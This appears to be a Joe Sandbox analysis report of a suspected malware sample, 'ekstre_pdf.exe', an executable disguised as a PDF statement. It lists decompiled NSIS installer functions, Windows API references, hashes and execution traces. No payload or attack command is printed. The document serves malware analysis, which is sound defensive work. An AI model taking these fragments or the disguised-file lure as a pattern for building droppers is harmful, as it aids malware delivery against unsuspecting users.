Source File: 00000000.00000002.3063969058.000000006ED61000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ED60000, based on PE: true

Associated: 00000000.00000002.3063862656.000000006ED60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064061225.000000006ED64000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3064139209.000000006ED66000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ed60000_ekstre_pdf.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: callback%d$error
API String ID: 2408954437-1307476583
Opcode ID: 5822e41919db11edaa5f25baf3b4e612a2dc54fc6d7d5bb6c8a1b5f11c199de3
Instruction ID: bf41efa2bae8524e9640ef8c238ec0fe828ebf0d40b925f0ba8b7a9e1ccecc0b
Opcode Fuzzy Hash: 5822e41919db11edaa5f25baf3b4e612a2dc54fc6d7d5bb6c8a1b5f11c199de3
Instruction Fuzzy Hash: 4FF03035208120EFDB048B88D968DBA73A5FF8A310F0585A8FD5D9B355C774EC4A8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp", "C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp\System.dll", 0x2000);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp\System.dll");
					}
				} else {
					E00402D84("true");
					 *0x40e5f0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nslB24E.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x47af88 =  *0x47af88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nslB24E.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nslB24E.tmp$C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll
API String ID: 1659193697-926164879
Opcode ID: 04bec734d47ce3e6585f81d7aad6ee80087d79bba73b9b2a4cdf6d3831b44896
Instruction ID: a79821fb5c638daf0e39524bf738908839f57f7c83e50dc13501ce6cdb35dd6c
Opcode Fuzzy Hash: 04bec734d47ce3e6585f81d7aad6ee80087d79bba73b9b2a4cdf6d3831b44896
Instruction Fuzzy Hash: 0F11EE71A00215BACB10BFB18E49A9D76606F40744F154C3FE002F61C2F6FC8991565D

Uniqueness

Uniqueness Score: -1.00%

Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x43c220; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x47af0c;
						if(_t2 >  *0x47af0c) {
							_t3 = CreateDialogParamW( *0x47af00, 0x6f, 0, E00402F93, 0);
							 *0x43c220 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x43c220; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x43c220 = 0;
					return _t6;
				}
			}

0x00403020
0x0040303a
0x00403040
0x0040304a
0x00403050
0x00403056
0x00403067
0x00403070
0x00000000
0x00403075
0x0040307c
0x00403042
0x00403049
0x00403049
0x00403022
0x00403022
0x00403029
0x0040302c
0x0040302c
0x00403032
0x00403039
0x00403039

APIs

DestroyWindow.USER32(00000000,00000000,004031F7,?,?,?,?,?,?,0040387D,?), ref: 0040302C
GetTickCount.KERNEL32 ref: 0040304A
CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: d83b9400ba2331dc68d6dc91edcd10559f00bf6eeb77af13ef52b2c39a3238d4
Instruction ID: 87b36bddbba2945165e536d3f1803947e22ee617314d5f15f9ac28a8e1351630
Opcode Fuzzy Hash: d83b9400ba2331dc68d6dc91edcd10559f00bf6eeb77af13ef52b2c39a3238d4
Instruction Fuzzy Hash: 46F01271942620AFC6616F50FD8899F7F68F744B527014CBAF145B11A8D73849818B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x464270, _a4);
				_t21 = E00405EB7(0x464270);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x47af18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x464270 >> 1;
						while(1) {
							_t11 = lstrlenW(0x464270);
							_push(0x464270);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x464270);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405f20
0x00405f2b
0x00405f2f
0x00405f36
0x00405f42
0x00405f52
0x00405f54
0x00405f6c
0x00405f6d
0x00405f74
0x00405f75
0x00000000
0x00000000
0x00405f58
0x00405f5f
0x00405f67
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f5f
0x00405f77
0x00000000
0x00405f8b
0x00405f44
0x00405f4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f4a
0x00405f31
0x00000000

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00002000,0040369D,00472F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,00464270,?,00405F2B,00464270,00464270,759D3420,?,004E0000,00405C69,?,759D3420,004E0000,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(00464270,00000000,00464270,00464270,759D3420,?,004E0000,00405C69,?,759D3420,004E0000,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(00464270,00464270,00464270,00464270,00464270,00464270,00000000,00464270,00464270,759D3420,?,004E0000,00405C69,?,759D3420,004E0000), ref: 00405F7D

Strings

pBF, xrefs: 00405F1A

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: pBF
API String ID: 3248276644-4131420256
Opcode ID: a1f7fceab5ece29a96d4827224ee0310d646f87140eb7eccfb3c883b25914e1d
Instruction ID: e26d393ce945a058dae834579a4bf65e1cabec1bcade068554654f23c0b4f6fc
Opcode Fuzzy Hash: a1f7fceab5ece29a96d4827224ee0310d646f87140eb7eccfb3c883b25914e1d
Instruction Fuzzy Hash: D4F0F426119D5226DB22333A5C09EAF0554CED2364719023BF895B12C5DB3C8A83D8EE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x450254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x450254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x45025c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, "true");
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

0x00405517
0x00405521
0x0040553d
0x0040555f
0x00405562
0x00405568
0x00405572
0x00405573
0x00405575
0x0040557b
0x0040557b
0x00405585
0x00000000
0x00405593
0x0040554a
0x00405582
0x00405582
0x00000000
0x00405582
0x00405556
0x00405558
0x00000000
0x00405558
0x00405527
0x00000000
0x00000000
0x0040552e
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: df1a76779a655c7643f77678d8a13c56cb126c0a15e841441d69746f774f48a3
Instruction ID: 7d7cdd3d76a29b1557aa8ebd7a9e34b3165a404649021c7b930b986d6b852f3b
Opcode Fuzzy Hash: df1a76779a655c7643f77678d8a13c56cb126c0a15e841441d69746f774f48a3
Instruction Fuzzy Hash: 2301B171100608BFDF209F11DD84A6B3B27EB84754F10443AFA017A1D5D73ACE519A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x4000;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ffe] = _t30[0x3ffe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00004000,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nslB24E.tmp\System.dll), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: be4399b306d8b99a97a8a0a4da68d4a40b7d2479177ce00aefaf3d374e73f083
Instruction ID: 0b01452387d035716c5ae008d1c878d0c1493fab46661662bed763a99499856e
Opcode Fuzzy Hash: be4399b306d8b99a97a8a0a4da68d4a40b7d2479177ce00aefaf3d374e73f083
Instruction Fuzzy Hash: E2017172500209AADF21CF51CC09EDB3BB8EF54354F014039FD55A6190D738D964DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405fa2
0x00405fa4
0x00405fa7
0x00405fd3
0x00405fac
0x00405fb5
0x00405fba
0x00405fc5
0x00405fc8
0x00405fe4
0x00405fca
0x00405fd1
0x00000000
0x00405fd1
0x00405fdd
0x00405fe1
0x00405fe1
0x00405fdb
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.3001752822.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3001707917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001818113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000448000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.00000000004D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3001864419.0000000000568000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3002524444.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre_pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ekstre_pdf.exePID: 3132, Parent PID: 6632COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 340A2C30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2C3A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6987b78c4516cbf8539d1902c159fc304f2f63ebc085b707e4c195d544765bb4
Instruction ID: 428f398e023d7c0a420b68c92fb0c090b5207b8630a333e8b6e3aeb641b9ac7d
Opcode Fuzzy Hash: 6987b78c4516cbf8539d1902c159fc304f2f63ebc085b707e4c195d544765bb4
Instruction Fuzzy Hash: 7E90022A31300003D9807158554864A000547E1246F91D85AA4806519CC925C86D6325

Uniqueness

Uniqueness Score: -1.00%

Function 340A2C50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2C5A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 930d5f1b82e57532668dceda661e370811cccebd561d1c789a5b9eef95f92d4b
Instruction ID: 49a25f53c0947c3e932a8dfcc7a6b810e228f668474091e95f254f105cb0c61a
Opcode Fuzzy Hash: 930d5f1b82e57532668dceda661e370811cccebd561d1c789a5b9eef95f92d4b
Instruction Fuzzy Hash: 7B90022230100003D94071585558646400597F1345F51D456E4C05515CD925C85A6226

Uniqueness

Uniqueness Score: -1.00%

Function 340A2CF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2CFA

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 64129b4a00c815990ea8049f5294bb52f1c4c301efcccb4806269af78b2b635e
Instruction ID: 45c7aba623bc5fc23c068d3dbbfa1d27c1a94bfe29c02eb5dc4b54b8ba3efad4
Opcode Fuzzy Hash: 64129b4a00c815990ea8049f5294bb52f1c4c301efcccb4806269af78b2b635e
Instruction Fuzzy Hash: F4900222342041539D45B1584544547400657F0285791C457A5C05911CC536D85AE625

Uniqueness

Uniqueness Score: -1.00%

Function 340A2D10 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 340A2D1A

Memory Dump Source

Source File: 00000001.00000002.3100797476.0000000034030000.00000040.00001000.00020000.00000000.sdmp, Offset: 34030000, based on PE: true

Associated: 00000001.00000002.3100797476.0000000034159000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3100797476.000000003415D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34030000_ekstre_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b21fe046127574566c81f3c8f015a3a1ce97c9c9f0cfa7c651b1381bd98a4123
Instruction ID: 39f57d061144e15ce73c57f07722789e5a03cae90ac833e431dded033efed58b
Opcode Fuzzy Hash: b21fe046127574566c81f3c8f015a3a1ce97c9c9f0cfa7c651b1381bd98a4123
Instruction Fuzzy Hash: 4890023230100413D91161584644747000947E0285F91C857A4C15519DD666C956B125

Uniqueness

Uniqueness Score: -1.00%

Function 340A2DA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

